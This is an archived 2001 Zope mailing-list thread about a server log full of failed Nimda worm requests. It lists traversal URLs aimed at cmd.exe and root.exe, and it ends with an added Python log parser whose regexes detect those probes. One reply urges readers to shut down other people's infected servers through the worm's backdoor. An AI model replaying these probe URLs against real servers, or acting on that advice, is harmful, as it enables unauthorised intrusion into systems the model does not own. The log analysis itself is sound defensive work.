[Zope] Zope 1 : NIMDA 0
Michael Montagne <montagne@boora.com>
Thu, 20 Sep 2001 14:08:31 -0700
How do you get that log from Zope?
On Thu, Sep 20, 2001 at 08:30:33PM +0000, Reinoud van Leeuwen wrote:
> On 20 Sep 2001 18:28:43 -0000, you wrote:
>
> >Failure Report (9/19/2001 - 24 hour report)
> >Listing the top 30 files by the number of failed requests, sorted by the number of failed requests.
> >
> >reqs: file
> >----: ----
> >1210: /scripts/..%255c../winnt/system32/cmd.exe
> >1210: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
> >1204: /scripts/..%5c../winnt/system32/cmd.exe
> >1204: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
> > 615: /scripts/root.exe
> > 615: /scripts/root.exe?/c+dir
> > 611: /MSADC/root.exe
> > 611: /MSADC/root.exe?/c+dir
> > 610: /c/winnt/system32/cmd.exe
> > 610: /c/winnt/system32/cmd.exe?/c+dir
> > 609: /d/winnt/system32/cmd.exe
> > 609: /d/winnt/system32/cmd.exe?/c+dir
> > 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> > 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> > 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > 604: /scripts/..%c1%1c../winnt/system32/cmd.exe
> > 604: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
> > 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
> > 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> > 603: /scripts/..%c0%af../winnt/system32/cmd.exe
> > 603: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
> > 603: /scripts/winnt/system32/cmd.exe
> > 603: /scripts/winnt/system32/cmd.exe?/c+dir
> > 602: /scripts/..%c1%9c../winnt/system32/cmd.exe
> > 602: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
> > 598: /scripts/..%252f../winnt/system32/cmd.exe
> > 598: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
> >
> >That is a lot of requests! Glad Zope could handle it.
> >
>
> You can "help" your infected neighbours by remotely turning their
> infected servers off! see
> http://pc.xs4all.nl/default.ida
>
> (it is a Perl script that uses the same backdoor as the virus itself.
> I've not yet installed perl in Zope, but am working on it ";-)
>
> --
> __________________________________________________
> "Nothing is as subjective as reality"
> Reinoud van Leeuwen reinoud@xs4all.nl
> http://www.xs4all.nl/~reinoud
> -> when replying to a mailinglist mail, please do <-
> -> *NOT* cc: me as well. If I read the list I will <-
> -> receive the reply as well! <-
> __________________________________________________
>
> _______________________________________________
> Zope maillist - Zope@zope.org
> http://lists.zope.org/mailman/listinfo/zope
> ** No cross posts or HTML encoding! **
> (Related lists -
> http://lists.zope.org/mailman/listinfo/zope-announce
> http://lists.zope.org/mailman/listinfo/zope-dev )
--
Michael Montagne
montagne@boora.com
http://www.boora.com
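
For the question above, one way to build a failure report like the quoted one from an access log and label the probe shapes it contains. This is an added example, not code from the thread or from Zope: it assumes the log is in Common Log Format and treats status 400 and above as failed; the function names are hypothetical and the sample lines are constructed.

```python
import re
from collections import Counter

# Common Log Format: host ident user [time] "METHOD path PROTO" status size
CLF = re.compile(r'\S+ \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) \S+')

# Labels for the request shapes visible in the quoted report.
PROBES = [
    ("double-encoded traversal", re.compile(r"\.\.%25(5c|2f)", re.I)),
    ("overlong UTF-8 traversal", re.compile(r"\.\.%c[01]%[0-9a-f]{2}", re.I)),
    ("encoded backslash traversal", re.compile(r"\.\.%5c", re.I)),
    ("command interpreter request", re.compile(r"/(cmd|root)\.exe(\?|$)", re.I)),
]

def classify(path):
    """Return the labels of every probe pattern found in a request path."""
    return [label for label, rx in PROBES if rx.search(path)]

def failure_report(lines, top=30):
    """Return [(count, path, labels)] for failed requests, most frequent first."""
    failed = Counter()
    for line in lines:
        m = CLF.match(line)
        # Assumption: "failed" means an HTTP status of 400 or above.
        if m and int(m.group(2)) >= 400:
            failed[m.group(1)] += 1
    ranked = sorted(failed.items(), key=lambda kv: (-kv[1], kv[0]))
    return [(n, path, classify(path)) for path, n in ranked[:top]]

# Constructed sample lines (documentation addresses), not taken from the thread.
SAMPLE = [
    '192.0.2.10 - - [19/Sep/2001:10:00:01 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210',
    '192.0.2.77 - - [19/Sep/2001:10:00:03 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210',
    '192.0.2.10 - - [19/Sep/2001:10:00:04 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210',
    '192.0.2.10 - - [19/Sep/2001:10:00:05 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210',
    '198.51.100.5 - - [19/Sep/2001:10:00:06 -0700] "GET /index_html HTTP/1.0" 200 5120',
]

if __name__ == "__main__":
    print("reqs: file")
    print("----: ----")
    for count, path, labels in failure_report(SAMPLE):
        print(f"{count:4d}: {path}  [{', '.join(labels) or 'unclassified'}]")
```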